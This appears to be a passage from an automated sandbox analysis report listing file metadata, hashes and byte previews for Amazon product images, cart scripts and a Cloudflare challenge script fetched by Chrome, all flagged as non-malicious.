                                                                                                                                                                                                                                                                Entropy (8bit):7.962482170567861
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:K8pGqgdm7Yci0KU4PZZ4Rinn3gUqnB9buRuzjw04+0zYO025qO+:KSbgdmJIP0RGgdnXeulHW020
                                                                                                                                                                                                                                                                MD5:60623C4646282D289A224F338E5027FA
                                                                                                                                                                                                                                                                SHA1:EC353621A98227C23A8714D1D45B5B035C17BAC5
                                                                                                                                                                                                                                                                SHA-256:60F116071B18BA8E20C80523BD5BB71E19D4651C46DE740955506A568BD4384C
                                                                                                                                                                                                                                                                SHA-512:45129A87EE4F1BF495CC89711324FD2D58A7726B1DB8A6CFC82BC62E1DBAB65B999A743E8BB0176453F73741E3C413B00ECE78547E61942D0A7DC7262039892E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ"2q..BRa.......#DS....Tr..$%34Cbs......5t.....................................................!Q..1..A..."2Raq..B.#r...$34C.............?....V..M......j..O.Y.}..t.....(....S..-5.z@9Y%o...........)@...u..d....if...a{..M....(.#@.L...3y..i#1...k....go.&.7-EjE.._......>.H.).... ............-.9.d..o..>./....l.....^..+{..Q.^..r..M1@..w...~8>.......U..mE.SM..V/Zf.....V^.y.U..\..U.t).s...e8.._.t..w."C...TR..B...R.....N. E..4SJ.E .aI.NJ.eh.....xV.e.c\QH.;h.(...\S..]...(.[mxV..^b..C...&.H).-6u..]...O...B.......B..}N..i.I.c^...RG.4.v.M..U......MP;u.kw:..Y4).X....z...~.Qv.k...W.k5Lc.....M]...%..s.S..7.......w....b.u..}....O.K.>..>......'._.......}.c..'.d..y.......h.c&f...............lC../.....Z.^.4.....?V?.H..C..o|.~...O..}./..A.+d..{..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6513
                                                                                                                                                                                                                                                                Entropy (8bit):7.9342786267428265
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TVkzEG8nZKR7JbUklEC1ALyf05PPGCK1Nh6pJbSKCbU9R3tzhpFRvCM/:RdXnUJgkdWLL57K0dCQ9R3tzxRvC4
                                                                                                                                                                                                                                                                MD5:F84E61FAA6FD3B2CCF81CE0F941500D7
                                                                                                                                                                                                                                                                SHA1:25635603169FCB5F8947777FBD720041F7A62F98
                                                                                                                                                                                                                                                                SHA-256:8C55A81F7E4EF90E024AE3E82FDA16A86EF8D9DA9F58BF34B4ED59588F119A63
                                                                                                                                                                                                                                                                SHA-512:3A58FABE07A3A563318B3791EC59D93095D471110D393A922EE38681F055C534E850ACAC5DA4359327A358DE9154481EBC637383DF53454FD1E9EA1E2EF921AE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61b6kxdob4L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1..A."2aq..#BQRt...45rs......$36...&Cb....%c.................................................1....!AQ2."$4q...3R..............?..(...(...(...(...(.../.+_..u.....=..{{..-..K....0R9$7C.y.<....wd.9.xe.h..r.3<@..);...w.v~.k.gq.N..+L..C..$..;'..Z.-...nE...........".|..h.M...K{pZ.!t..H.........47f.....C.I d6p*.;9......G...A..D.Q..d...QE..QE..U|..QdG..A. c.b.Z...zXL~......w,......c...,$.]E`{g(.b...-W...-?.e........o.U........A'.A......R...O....<......H..x...~cX.(.c.>.?...9j..:).<..U(..2?.)....X.pq.......F.....O.,.CIU...PKy%..4..l.WP.l........Ug.gw...G.j3Z[...d....5.x...*....G.W:....k...e.|....E.. .+~......jM.,.M>'.9......?.S..v......)k.f...........\Mm..<H..**..<.J..v.I.,......'.Y.bO'9.rV=.p.z..I..{$N....@..QE..QE.!.}......U `...c.B.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13790
                                                                                                                                                                                                                                                                Entropy (8bit):7.924758207671438
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:5PK0j/hM9hevJuMBczrrQdJ1cyCxHundagiy0Hcb:5PK0z9vJDcz/QRcyjqyFb
                                                                                                                                                                                                                                                                MD5:3B15A57BC5BEEF25C19A78800A35DFA3
                                                                                                                                                                                                                                                                SHA1:0D1010DD4DB498F714FA95FF5B0F55CE97431E3B
                                                                                                                                                                                                                                                                SHA-256:E3EEAF0F462AF918DB2F5A43D4B95C73DC9F528D886F7628F6EBF312FD447383
                                                                                                                                                                                                                                                                SHA-512:7853F69530BDE143F3B9F0F919FCABAE52CFF9230E031DFF7858F477DF27147A7EFE56CDCC275268F0F9E569F7BBC8C09EF74D6F6A3A9F6E2CB75C802C68F59B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................,.......B.Y.c?.kW.4y.@c..Mk.R6.(UoJ..!c..i.{+e...nk........................?.g...]q.X...'H.3Xy.kb....\.5=Q.y0..)....9..S`......~p....rK2..~2..@@............<..G........yK..[e.7...1..^..i...&.-.....KyW2mQ.X..sQ........\y..m......Tj.q..w.i...5.O(.............xg...?\..s.._.]F..B..>.........v.....%.*B.$..hTt.b.Z..Eb.2T)9....v7.,....a..gd.-.].K....................fw=...k..e.,q<A...v........Q,"XK.4.j...T.....H/;\....[....^.pU.....&.,WS....7e...^`..........%X.../{.....iQ...c..&...X..].....\.Ab]r..I......p......u5].w\&.-e..DJ..Z.......k.............~.&..?.......r..vW.s.wx..Y...t..Y..}*a..h.r.k.^k..c.7k..^;J._6.~G$.k.yVM."..mm.N.oA...............U.~o...y...*V....SVl,...[s.....3.y...N.....lkc...}3.ok..Vx.|..fL..y.d;...#.-
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9789
                                                                                                                                                                                                                                                                Entropy (8bit):7.953808710159142
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:wDljIxh3ORIdorq7fJWdlSOwPG5eXfCo9gaByq:Iq3MshNOw+5IqoXByq
                                                                                                                                                                                                                                                                MD5:BDDE092F3026FA49A620361713B3F38F
                                                                                                                                                                                                                                                                SHA1:D058A1FBCCAFA4CE67C2CCE7B79E1FAAD1B1F382
                                                                                                                                                                                                                                                                SHA-256:60077684429F6B9A2DD7FC9843FEF0F7F13A8E3C48A6C7E889419334C50EF5A3
                                                                                                                                                                                                                                                                SHA-512:377BCF2AB7F00155530D702E219E114343B8A13721025075C36D1944160D339A2A5E693714AE36C897E68CAD6B22F690BCE4D03964C55BEFF9D20E92C5C580C6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61za6jnk1GL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.".AQ#2aq..B....Rr....CS.$%34Dbd....................................................1.!A.."q...Qa...R...#$23..............?..t...z..Y....X ..@.#R.....-.."...?...?....Zt.6q.UR..8I.....m-.f.8.......U~e.w.f..b..n...c..?.`_.z.....l./q.z.......L.kN....m.y.......j......t...,.k,..A.,...'...^...J...Y:.....X.a.n.rd`9j...,..k_......=&...../.2V..Z...!.......7..uTo...|#....I!.Q.Z%.Q........Q{.....+...3...]....A..q..|.".]..v../..-...*.y..,.I.+9..9Es.}....?....]N.&.,...X..6.vC...G..-...6.}y<w.......w.m...K.....s..K.=...F...~...M....z....H_.....d.gJ..=5...e......#.\I&^.G.C.....*]s.....i.A......k.!{7.FQ.....|....#...O. -m..m....1...VW.^...t..W0,.'.0.YX&9.....a..r.X..p.3..X...HrC.;JY.9.-l..rc..c..n.......bGj.)T.....)@)JP.R.....B:..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (578)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):39443
                                                                                                                                                                                                                                                                Entropy (8bit):5.2780704875671915
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:IkCPQDBmm1Xnqfl1Putay7q7KdzGPTILRMmG6uWI9ub2od4opBjSP9d6EaaV:7mmQfHPOzG7mGmFnQ
                                                                                                                                                                                                                                                                MD5:02E169681A08E9F586F64C18DA517907
                                                                                                                                                                                                                                                                SHA1:AEDFC6EC48E65427CDE94D4CE0BCD4B103274AA2
                                                                                                                                                                                                                                                                SHA-256:611F04E4D8CF8854DFF785B2A0796A1CB4A49240EF205D6E598F77678D14C4B1
                                                                                                                                                                                                                                                                SHA-512:FE4774B8EB9C3A79D92855063F7BA59554180CEE22B051FA3E83A22CF6BEDFB94CA94FD53F18C7DF4667219FB299BC9D368947ED06501DC42275B7BC45B1D9C3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/51VDFjVKl1L.js?AUIClients/CartD12nAssets
                                                                                                                                                                                                                                                                Preview:(function(m){var n=window.AmazonUIPageJS||window.P,u=n._namespace||n.attributeErrors,c=u?u("CartD12nAssets",""):n;c.guardFatal?c.guardFatal(m)(c,window):c.execute(function(){m(c,window)})})(function(m,n,u){m.when("A","jQuery","CartServerSetting","CartBaseView","Cart","dibs-csrf").register("dibs-desktop-cart-actions",function(c,e,b,f,k,g){if(0===e("html.a-mobile").length){e=function(a,d,e){var b=a.data.dibsItemId,c=a.data.itemID||b;a=a.data.isFresh;b=[{name:["submit.dibs-remove",b,b].join("."),value:1},.{name:"pageAction",value:"remove-dibs-item"}];a&&b.push({name:"expandFreshCart",value:1});b=b.concat(g.getFreshCsrf());c&&"undefined"!==c&&f.takeCartActionForSingleItem(c,"active","dibs-remove",b,null,d,e)};var h=function(a,d,e){e&&a.push({name:d,value:e})},l=function(a,d){return d.some(function(d){return a.startsWith(d)})};c.on("dibs:item:remove",e);return{selectItem:function(a,d,e){var b=a.data.itemID,c=a.data.dibsItemId,k=a.data.alexaBadgingId,w=a.data.brandId,r=a.data.cartType,D=a.da
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7775), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7775
                                                                                                                                                                                                                                                                Entropy (8bit):5.769244353220776
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:TktIrCtvO5F335wR6d23h1QSeGx+vjHChd7QAXIuN:TktIrz5F335wR6d23h1QrG+U7y4
                                                                                                                                                                                                                                                                MD5:BB149EC02ADA77C9A240AAB573AB5BDF
                                                                                                                                                                                                                                                                SHA1:7CD9D53ECC6582445A044B9E8A70C8C0FD64DEB5
                                                                                                                                                                                                                                                                SHA-256:5FB40F3770DDAF66C43D88C7350AD911668E73D41C95B8A51CB8937351F78A00
                                                                                                                                                                                                                                                                SHA-512:F41FE99A1D8E2C9E3121F4FA951625A774710A78F8723A23F1580D7DB988D5CC96602502C39935A6E402E25200EBD7881B45806D1506DC888F5D85DEF1FEF168
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://specialpoint.net/cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js?
                                                                                                                                                                                                                                                                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,m,n,x,y,A){V=b,function(c,e,U,f,C){for(U=b,f=c();!![];)try{if(C=parseInt(U(379))/1+parseInt(U(380))/2*(-parseInt(U(431))/3)+-parseInt(U(413))/4+parseInt(U(388))/5+parseInt(U(429))/6*(-parseInt(U(353))/7)+parseInt(U(411))/8+-parseInt(U(362))/9,e===C)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,180033),g=this||self,h=g[V(420)],m={},m[V(357)]='o',m[V(408)]='s',m[V(342)]='u',m[V(436)]='z',m[V(363)]='n',m[V(359)]='I',n=m,g[V(339)]=function(C,D,E,F,a4,H,I,J,K,L,M){if(a4=V,D===null||void 0===D)return F;for(H=v(D),C[a4(421)][a4(393)]&&(H=H[a4(400)](C[a4(421)][a4(393)](D))),H=C[a4(374)][a4(412)]&&C[a4(406)]?C[a4(374)][a4(412)](new C[(a4(406))](H)):function(N,a5,O){for(a5=a4,N[a5(432)](),O=0;O<N[a5(418)];N[O+1]===N[O]?N[a5(407)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a4(397)][a4(367)](I),J=0;J<H[a4(418)];K=H[J],L=s(C,D,K),I(L)?(M=L==='s'&&!C[a4(389)](D[K]),a4(398)===E+K?G(E+K,L):M||G(E+K,D[K])):G(E+K,L),J++);return F;fun
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 276x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9157
                                                                                                                                                                                                                                                                Entropy (8bit):7.898825099413577
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Dji0G/QZSqYbuH+YfzuzSehdk/F+5NozS4Qfk:DU/QYN6HYSeho+5NozFQs
                                                                                                                                                                                                                                                                MD5:CE3B172DD8BF58B016F21B8E42C8FF1A
                                                                                                                                                                                                                                                                SHA1:E7A2DF02C2A9671A7F041E92E923AF60292BE715
                                                                                                                                                                                                                                                                SHA-256:2295F17A01B735CB63C0CAD6D35ACEEE124C510F371DD1F89CA4678082534C65
                                                                                                                                                                                                                                                                SHA-512:3E110C5465E3F5C1B5485C919761FF7F0D9E038FB1A3B57CE765F38565E487FB74BC0420F77A05BDCBCDD7D4FACB47734515D67556D88206B73197CF40392C4C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/6112GiUzrdL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,......t.t...8E..>w...S.}&.a..........>...................{.6.(e.`..j.!.nM..vi.^a./.|.E..v.....l......=....F......Wg..Y.y...Uz...b.)#M....4.c.]'...`.?w...g!..K..XevY..f.X.=gq..{y....I^.1S*R..r,.VJ....t."S..H.....3..............YVI.....g.h~..K.z.F...B...)............(K..].\S.W.Y.}:u)...S.s;.].5.?...s..9..5...Gr...............;r.C'*...Q..K..N$W.v...iK..s....cu?w....r}%...=MU._....>g..Cx.G..".ty..J.qINVY.1u.s..9p..2..0[...Y.X]j.{..}J.9.-O..'..^w.o2.5+U..Jz.Y..u?...<i.....UP]SL..q..,.l9]6...`..u]KeV..>...^...7l..].p.)iT.f.....s..T.m3Ly.r..~..5.6.....&J..\...*L=U=.)m.e*l.Nc..t..7.1.?...4.d.".,cJ_=0..g.>9............;.....OJ..>..c..a=.e-tl.9.....<..[..Z.0..K..XE.!.[B....q.+l2..V...=......]Qp._......>.3.}.@j|?I...e.W..2i...[...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14932
                                                                                                                                                                                                                                                                Entropy (8bit):7.92744198878233
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:/jkrSJLdG0q4/qaBgLXNgEaEwlM2AIQJXnqVaNXRj:orSJY0q4/qaBINg4JXnq0xRj
                                                                                                                                                                                                                                                                MD5:405F2D18906DB59E62294607F35B4C5A
                                                                                                                                                                                                                                                                SHA1:A4C51835965EF7B2CFC318368AC31DC9C28F178F
                                                                                                                                                                                                                                                                SHA-256:8468201EADD075F91789D50F89738E782078780EAF0ADF54014DF55DF037670D
                                                                                                                                                                                                                                                                SHA-512:438B25D7CED128C037B4A4E599299D8BD6E231E196ED750DA9A48E4EAAE2E953CDC379EBE01A2A3F1B44B1BA112BCCCC85BF79E69B09B05E015DE9285F1EC9FC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/716-WxhiNnL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3......................................................................9;ym^,........}3.J.....Mq.If.Rt....Yh.........(.h./[#..,2..oG...'...5..~q..v...13.8..A.N...!.7.S._..3._......{X.u.=.......U.Rr..4.].J/.TJI.DT.#R....&..Uwe..7f^{ZI.B."a...tT......c...i....evq.t...,.y..y........ly.7.....Tk(S.F...7.`...7y...9I8...M..{+..."i'..YC....V....ik....$...|.Q|xF.p..........4................;.=rr.i...7h..'r....>..!.f^...4q:hK.i.....oW.7.{s.Y8.....*.c..o.....>Z.JK.0......1.a...|.>.j.....:..........P}N.u.{..^]y.7...Oci..l.o..Pg.Z.o.tn.......}K..x..\.w_..?:..H.....^{t.......H..........P|...2......y#..S..G./..Z^..}N9..6..h...W..m..G.._i.7y....+..nx..c.s..A.!6.).._..N.=..............qs.3].Wk.M:^..,.K.u.b.......... ..c]a...<.dm.......v..N.@.v.ea.:..YO.D....[e.80........G..'Z.e.T
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5079
                                                                                                                                                                                                                                                                Entropy (8bit):7.919778879712116
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T/DqZYvVQKmydn4QqLoqWUl6HK/I4nIkNVDunwVaNdig4i2Xk:fqGoWqLoqWUl6HKQ4nIk/wENi2U
                                                                                                                                                                                                                                                                MD5:F7EDBD0246CFF1C0EA20B5987B2532C1
                                                                                                                                                                                                                                                                SHA1:F9ECDBDB2FA9FF038461F0D4CD02138698D2176C
                                                                                                                                                                                                                                                                SHA-256:C51AE833238845BD035578966E45DA610D40EE924EE2386A9002E177E1E7FFBF
                                                                                                                                                                                                                                                                SHA-512:A6DAD617423CB07A0AB705C5983B00054779E3D7170E0CF0962E13C141591270AF5344905DF4FE297AAC075BBD1199B8064907EB82BE2E8202F7803329090090
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1...AqSa...."2BQR......#Cbdr.....3....$4D%U....................................................!1aAq."#23Q...............?..(..(.....(..+...a.y.u#RY.......lbi.p....N...f'.FK..Zoh.W0...>.&. .....y.......USj6..h..cm/fh..f#.6.&@TE..a..;.*...Li.G.lL1..r%..?...t...E......*..a..g3.ot./........DV...=...T!.%....6}.5..w..L.}..*.c.]..i.....h.B.Q..!j.Pv......d..\./l.-.^.....-..b.\LJ...3.F.P.?K/q`H..+....#k3..<Vz..{..-.p..W}.2..t...#..E.q..t.Q...1.A,Y/...Z6..~*.K.M...W.N..f..+..(.....(..(..(..(.....(...J{g....$...d..............1.^.J...:.M....6.l.9..... .....v.S..u43Eh.b2.......... u+.+\iEq%.9.I.0t..bsb..R.Wb.e..y....r.&.s.s#..AC]...).l.M..j...l.d...Hs#.;15!ERYe7l.......QU.P6..3hY.......Fb|.pY............U.C,.7g..W"".%.8.l..um.+..-.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8279
                                                                                                                                                                                                                                                                Entropy (8bit):4.80472773710838
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:NXK0lKxspheicMgCSywVg+9GgZi6FVLZmMDWD+LAQ8zZOsWJ2p+eV5S+rTXrU8Kc:NXVl4wg4wVg+9dg3Kp8QOjeZuj2XW
                                                                                                                                                                                                                                                                MD5:CF1534646ECB2265F727E093BDB8EAFF
                                                                                                                                                                                                                                                                SHA1:10014B8A4A6D60F3FC8744ACBB3051F1EE8BE698
                                                                                                                                                                                                                                                                SHA-256:BF4C7DFDC746160EA4410DCB2A3E940FE4271D1BEDBA7D2C7847A90B02440468
                                                                                                                                                                                                                                                                SHA-512:1F5628EAC34C3201886B120BE9263329798AE942FCC4EE4736C008F5F1B959BA5E43B43D7676C7A09D660B3AAFD82CBC442E88832937C344BBA1503583E562BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/cart/empty/kettle-desaturated._CB424694147_.svg
                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1106.02 634.55"><defs><style>.cls-1{fill:#eaeded;}.cls-2{fill:#d5dbdb;}.cls-3{fill:#889596;}.cls-4{fill:#b8dde2;}.cls-5{fill:#fff;}.cls-6{fill:#9fcbce;}.cls-7{fill:#fafafa;}.cls-8{fill:#cde6e0;}.cls-9{fill:#b4d1ca;}.cls-10{fill:#eefaf5;}.cls-11{fill:#eff5ed;}.cls-12{fill:#cee0ad;}</style></defs><title>kettle-desaturated</title><g id="Layer_2" data-name="Layer 2"><g id="kettle"><path id="background" class="cls-1" d="M1106,401.13H0s-3.86,163,286.1,163c214,0,381.91,70.42,601.91,70.42S1106,401.13,1106,401.13Z"/><g id="echo"><path id="echo-shadow" class="cls-2" d="M562.47,429.56C562.38,435.32,684.75,440,795.22,440s167.2-4.67,167.29-10.43-56.5-10.42-167-10.42S562.56,423.81,562.47,429.56Z"/><polygon id="echo-back" class="cls-3" points="1012.92 155.71 1020.09 155.71 1020.09 418.21 958.21 439.64 1012.92 155.71"/><polygon id="echo-front" class="cls-4" points="787.69 155.71 1012.92 155.71 958.21 439.64 732.97 439.64 787.69 155.71"/><polygon id=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8637
                                                                                                                                                                                                                                                                Entropy (8bit):7.958207033321553
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:aqW+6S9dA83uhHYLWJLwH6Q/GmKKsEz5hLwf23MTkSi0v+mxOg:aqXTQtDQ+mK3EzLL2tbGYT
                                                                                                                                                                                                                                                                MD5:035AE30289780A9F82C2A38682AC1454
                                                                                                                                                                                                                                                                SHA1:45F2F2CB1057142C542C88659FCC3EAD80F357C7
                                                                                                                                                                                                                                                                SHA-256:0A9EA6A7EEA0C599FEBC9EF3004FCE0F5F1E393B33FB3D6D0845F5F862B8D8CF
                                                                                                                                                                                                                                                                SHA-512:76BCF3472579F9391CA2DFADADEE5712D7A9C76EAA2E523005D20C64F9E992879A89D463B2C6E06E5CCF3C45345FF22DC8377D618B11A68335AA17C97FFF9F67
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61aUMxz8J-L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1A.."Qaq2..Bb.....#3Cr.$Rcs....4T...................................................!1..2A"Qa...3q5C...#Br...............?..t.R..R.J.%J.*..*T.x..`>...*.>.k...(.;y.>.i...!..j&f..m...-%..........~.9..*..y.s.._.ek.v.{......c.C~.]..f.]..k,....W....r.;.N....b...S..UX..;_..9...-.Y.r..s....U.CE......7.ZK!bs.q.s.j.......b!_f.!.6...'.kf.E..H...F..CD...9.>uc...KK..0..&....J.t.8.y..X.N?....C.=.U...."t.<^......v....|...5.I...;....W..I ..c.....7.7.......{.y...a. U.m......M{.......7..r.1.......D.....UR...U..\.s..ZXT...!.Z\...M.......]...b...9.R..~:F....H4...S....>L...4.>=#.....A...86.8w..=Q.~Gv....M..2.d.N.??...Q........=..j....cZ..V.Fn.e.K6..wU....V....n..z.Un...-.Hs,........Q........G.QST.R..Rf....9.D.6...}..2L......fhB...P..J..8...9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 242x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6249
                                                                                                                                                                                                                                                                Entropy (8bit):7.851015435743561
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TK1FiH14iAjxbnuOAwb1bNua0gFFTmOIvNdhJVhYifBd0MeKe0RDRdLd1rn9EgD+:irvAw9lTTevdFY40MewtXT9/iME
                                                                                                                                                                                                                                                                MD5:764117234C27EF407726473247DCBBB2
                                                                                                                                                                                                                                                                SHA1:AF70B849181C6FC9DEA9FB9CA6787E1485796A12
                                                                                                                                                                                                                                                                SHA-256:A88E346DC3F70663C42C4A46F1C19FF4F3E35082B4E572B4A930916218D94A59
                                                                                                                                                                                                                                                                SHA-512:05EC358FBBEDFF31BF459D72E6984E8FA529522E85BD56C285D7182FAF240F750DABF07CFEE1845B389947EA5AB4393D3AF461DD2B315684E703EC7F75C35449
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................X....7\F..:{.?4;|.=.P6'......#.N......dWhe-..Q.c5.L.;.............$uAx......D.c.....x<M.;..{~b>.iP.Y7..c...L._d.S..W<d.....@........W._7...N)._+.}.}..l.:........;'`U..#...|.w..Yl0..F..H........8......[N2.E?..}.{..M..-x5.W.7......i....B......m.E;O.H.a.r^.|.s.YE...[.............{.Zbo.f;.{.i...S..F..M....q.Y@2......>(.L....C..'6....`..~.j.$#.......jT..Fz....P...I.X......'/.p.@.H..Rfy........c....duK.%...9.Rs)..z,.qGK.....<.+.........A..5....._t7X...n..q%i'Y............C...kd#=.N.6.T..........-..........................................!.."12@0 3AB..#CQRa.............`.M.?...j%M_U.j?.&wa...g.....6..v.[..%....&O*yP...w..]]_.p.s.\.|%.'......yS.[..RR.Q`.-........`...i._..O"yS.VwX..=.-.i<....&."..q]..8..Q.4c.|.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
